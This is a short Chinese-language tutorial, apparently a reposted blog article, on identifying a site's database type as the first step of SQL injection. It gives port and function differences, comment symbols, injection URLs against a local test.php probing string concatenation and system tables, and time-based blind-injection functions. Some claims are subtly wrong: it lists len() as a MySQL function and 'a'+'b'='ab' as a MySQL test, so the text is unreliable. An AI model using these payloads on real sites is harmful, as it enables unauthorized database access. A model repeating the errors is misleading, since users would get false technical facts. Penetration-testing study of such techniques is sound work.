SQL注入如何判断数据库类型
前言
在进行SQL注入之前,首先应该判断数据库的类型,不同的数据库在处理一些函数的时候会有一些微妙的差别,只有判断出是哪种数据库类型,这样才能根据数据库的类型选择合适的函数,更容易实现SQL注入。
(图片来源网络,侵删)
# 前端与数据库类型
asp:SQL Server,Access .net:SQL Server php:MySQL,PostgreSQL java:Oracle,MySQL
# 根据端口判断
Oracle:默认端口 1521 SQL Server:默认端口 1433 MySQL:默认端口 3306
# 根据数据库特有函数来判断
# len和length
len():SQL Server 、MySQL以及db2返回长度的函数。 length():Oracle和INFORMIX返回长度的函数。
# version和@@version
version():MySQL查询版本信息的函数 @@version:MySQL和SQL Server查询版本信息的函数
# substring和substr
MySQL两个函数都可以使用 Oracle只可调用substr SQL Server只可调用substring
# 根据特殊符号进行判断
/* 是MySQL数据库的注释符 -- 是Oracle和SQL Server支持的注释符 ; 是子句查询标识符,Oracle不支持多行查询,若返回错误,则说明可能是Oracle数据库 # 是MySQL中的注释符,返回错误则说明可能不是MySQL,另外也支持-- 和/**/
# 根据数据库对字符串的处理方式判断
# MySQL
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'
# Oracle
http://127.0.0.1/test.php?id=1 and 'a'||'b'='ab' http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'
# SQL Server
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab'
# 根据数据库特有的数据表来判断
# MySQL(version>5.0)
http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1
# Oracle
http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1
# SQL Server
http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1
# 根据盲注特别函数判断
# MySQL
BENCHMARK(1000000,ENCODE('QWE','ASD')) SLEEP(5)
# PostgreSQL
PG_SLEEP(5) GENERATE_SERIES(1,1000000)
# SQL Server
WAITFOR DELAY '0:0:5'
文章版权声明:除非注明,否则均为主机测评原创文章,转载或复制请以超链接形式并注明出处。